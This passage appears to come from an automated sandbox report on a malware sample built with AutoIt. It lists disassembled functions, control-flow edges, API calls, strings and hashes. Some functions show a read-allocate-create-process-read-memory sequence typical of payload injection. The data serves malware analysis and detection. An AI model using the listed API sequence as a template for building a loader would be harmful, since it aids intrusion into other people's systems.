                                                                        • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E
                                                                        Function 004115D7 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 2128 4115d7-4115df 2129 4115ee-4115f9 call 4135bb 2128->2129 2132 4115e1-4115ec call 411988 2129->2132 2133 4115fb-4115fc 2129->2133 2132->2129 2136 4115fd-41160e 2132->2136 2137 411610-41163b call 417fc0 call 41130a 2136->2137 2138 41163c-411656 call 4180af call 418105 2136->2138 2137->2138
                                                                        APIs
                                                                        • _malloc.LIBCMT ref: 004115F1
                                                                          • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                          • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                          • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                        • std::exception::exception.LIBCMT ref: 00411626
                                                                        • std::exception::exception.LIBCMT ref: 00411640
                                                                        • __CxxThrowException@8.LIBCMT ref: 00411651
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                        • String ID: ,*H$4*H$@fI
                                                                        • API String ID: 615853336-1459471987
                                                                        • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                        • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                                        • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                        • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D
                                                                        Function 03EC0A40 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 2147 3ec0a40-3ec0aee call 3ebe470 2150 3ec0af5-3ec0b1b call 3ec1950 CreateFileW 2147->2150 2153 3ec0b1d 2150->2153 2154 3ec0b22-3ec0b32 2150->2154 2155 3ec0c6d-3ec0c71 2153->2155 2161 3ec0b39-3ec0b53 VirtualAlloc 2154->2161 2162 3ec0b34 2154->2162 2156 3ec0cb3-3ec0cb6 2155->2156 2157 3ec0c73-3ec0c77 2155->2157 2163 3ec0cb9-3ec0cc0 2156->2163 2159 3ec0c79-3ec0c7c 2157->2159 2160 3ec0c83-3ec0c87 2157->2160 2159->2160 2166 3ec0c89-3ec0c93 2160->2166 2167 3ec0c97-3ec0c9b 2160->2167 2168 3ec0b5a-3ec0b71 ReadFile 2161->2168 2169 3ec0b55 2161->2169 2162->2155 2164 3ec0d15-3ec0d2a 2163->2164 2165 3ec0cc2-3ec0ccd 2163->2165 2172 3ec0d2c-3ec0d37 VirtualFree 2164->2172 2173 3ec0d3a-3ec0d42 2164->2173 2170 3ec0ccf 2165->2170 2171 3ec0cd1-3ec0cdd 2165->2171 2166->2167 2174 3ec0c9d-3ec0ca7 2167->2174 2175 3ec0cab 2167->2175 2176 3ec0b78-3ec0bb8 VirtualAlloc 2168->2176 2177 3ec0b73 2168->2177 2169->2155 2170->2164 2180 3ec0cdf-3ec0cef 2171->2180 2181 3ec0cf1-3ec0cfd 2171->2181 2172->2173 2174->2175 2175->2156 2178 3ec0bbf-3ec0bda call 3ec1ba0 2176->2178 2179 3ec0bba 2176->2179 2177->2155 2187 3ec0be5-3ec0bef 2178->2187 2179->2155 2183 3ec0d13 2180->2183 2184 3ec0cff-3ec0d08 2181->2184 2185 3ec0d0a-3ec0d10 2181->2185 2183->2163 2184->2183 2185->2183 2188 3ec0bf1-3ec0c20 call 3ec1ba0 2187->2188 2189 3ec0c22-3ec0c36 call 3ec19b0 2187->2189 2188->2187 2195 3ec0c38 2189->2195 2196 3ec0c3a-3ec0c3e 2189->2196 2195->2155 2197 3ec0c4a-3ec0c4e 2196->2197 2198 3ec0c40-3ec0c44 CloseHandle 2196->2198 2199 3ec0c5e-3ec0c67 2197->2199 2200 3ec0c50-3ec0c5b VirtualFree 2197->2200 2198->2197 2199->2150 2199->2155 2200->2199
                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03EC0B11
                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03EC0D37
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1595095018.0000000003EBE000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EBE000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3ebe000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFileFreeVirtual
                                                                        • String ID:
                                                                        • API String ID: 204039940-0
                                                                        • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                        • Instruction ID: 2495256e2f7d05974ca48cb2620875185506724ccbbe6ce0f2b06d191c8da8a3
                                                                        • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                        • Instruction Fuzzy Hash: 52A11874E10249EBDB14CFA4CA94BEEBBB5BF48308F24929DE501BB280D7759E41CB54
                                                                        Function 00401250 Relevance: 10.6, APIs: 7, Instructions: 86windowtimeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 2201 401250-40125c 2202 401262-401293 call 412f40 call 401b80 2201->2202 2203 4012e8-4012ed 2201->2203 2208 4012d1-4012e2 KillTimer SetTimer 2202->2208 2209 401295-4012b5 2202->2209 2208->2203 2210 4012bb-4012bf 2209->2210 2211 4272ec-4272f2 2209->2211 2212 4012c5-4012cb 2210->2212 2213 42733f-427346 2210->2213 2214 4272f4-427315 Shell_NotifyIconW 2211->2214 2215 42731a-42733a Shell_NotifyIconW 2211->2215 2212->2208 2216 427393-4273b4 Shell_NotifyIconW 2212->2216 2217 427348-427369 Shell_NotifyIconW 2213->2217 2218 42736e-42738e Shell_NotifyIconW 2213->2218 2214->2208 2215->2208 2216->2208 2217->2208 2218->2208
                                                                        APIs
                                                                          • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                                          • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                                          • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                        • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                                        • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                                        • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                                        • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                                        • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                                        • String ID:
                                                                        • API String ID: 3300667738-0
                                                                        • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                                        • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                                        • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                                        • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                                                        Function 0040E4C0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79registryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 2219 40e4c0-40e4e5 call 403350 RegOpenKeyExW 2222 427190-4271ae RegQueryValueExW 2219->2222 2223 40e4eb-40e4f0 2219->2223 2224 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 2222->2224 2225 42721a-42722a RegCloseKey 2222->2225 2230 427210-427219 call 436508 2224->2230 2231 4271f7-42720e call 402160 2224->2231 2230->2225 2231->2230
                                                                        APIs
                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: QueryValue$CloseOpen
                                                                        • String ID: Include$Software\AutoIt v3\AutoIt
                                                                        • API String ID: 1586453840-614718249
                                                                        • Opcode ID: 89069ff54290d95ffeb0e4b83fb23c072447fe8f5d078393e68a3dec861a8096
                                                                        • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                                        • Opcode Fuzzy Hash: 89069ff54290d95ffeb0e4b83fb23c072447fe8f5d078393e68a3dec861a8096
                                                                        • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                                                        Function 00410570 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                        • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                        • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CreateShow
                                                                        • String ID: AutoIt v3$edit
                                                                        • API String ID: 1584632944-3779509399
                                                                        • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                        • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                                        • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                        • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                                                        Function 0047974B Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 349COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$Copy$ClearErrorLast
                                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                                        • API String ID: 2487901850-572801152
                                                                        • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                        • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                                        • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                        • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                                        Function 03EC0820 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 142fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 03EC0710: Sleep.KERNELBASE(000001F4), ref: 03EC0721
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03EC0937
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1595095018.0000000003EBE000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EBE000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3ebe000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFileSleep
                                                                        • String ID: SKGP1X9WRC3JNV8N52
                                                                        • API String ID: 2694422964-126846259
                                                                        • Opcode ID: 8ccb9d43d7e13714bfb030ef9ba41fa9e06fd3f2b9a5fb613a87a3226794bf7b
                                                                        • Instruction ID: 61245efca7a9efd673937600b497cb40410abea1865d7e6786f73f0e1ac9c672
                                                                        • Opcode Fuzzy Hash: 8ccb9d43d7e13714bfb030ef9ba41fa9e06fd3f2b9a5fb613a87a3226794bf7b
                                                                        • Instruction Fuzzy Hash: 95519231D14289DAEF11DBA4C814BEFBB78AF44304F044299E209BB2C0D6B95B49CBA5
                                                                        Function 00401B80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                        • _wcsncpy.LIBCMT ref: 00401C41
                                                                        • _wcscpy.LIBCMT ref: 00401C5D
                                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                                        • String ID: Line:
                                                                        • API String ID: 1874344091-1585850449
                                                                        • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                        • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                                        • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                        • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                                        Function 0040F250 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                                        • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                                        • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                                        • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Close$OpenQueryValue
                                                                        • String ID: Control Panel\Mouse
                                                                        • API String ID: 1607946009-824357125
                                                                        • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                        • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                                        • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                        • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                                        Function 004102B0 Relevance: 7.6, APIs: 5, Instructions: 87COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                        • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                        • _wcsncpy.LIBCMT ref: 004102ED
                                                                        • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                        • _wcsncpy.LIBCMT ref: 00410340
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                                        • String ID:
                                                                        • API String ID: 3170942423-0
                                                                        • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                        • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                                        • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                        • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                                                        Function 00475077 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 390COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Wu
                                                                        • API String ID: 0-4083010176
                                                                        • Opcode ID: ac2af2b7dd81419509de71c9350aa4b734b6b08f84a213f51213f73945ed2752
                                                                        • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                                        • Opcode Fuzzy Hash: ac2af2b7dd81419509de71c9350aa4b734b6b08f84a213f51213f73945ed2752
                                                                        • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                                        Function 00475300 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                                        • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Process$CurrentTerminate
                                                                        • String ID: Wu
                                                                        • API String ID: 2429186680-4083010176
                                                                        • Opcode ID: 9ace156a5ba4ea3c1b64ea5599e57396709bab4ff04b71781185cc0804226018
                                                                        • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                                        • Opcode Fuzzy Hash: 9ace156a5ba4ea3c1b64ea5599e57396709bab4ff04b71781185cc0804226018
                                                                        • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                                        Function 03EBF710 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 03EBFECB
                                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03EBFF61
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03EBFF83
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1595095018.0000000003EBE000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EBE000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3ebe000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                        • String ID:
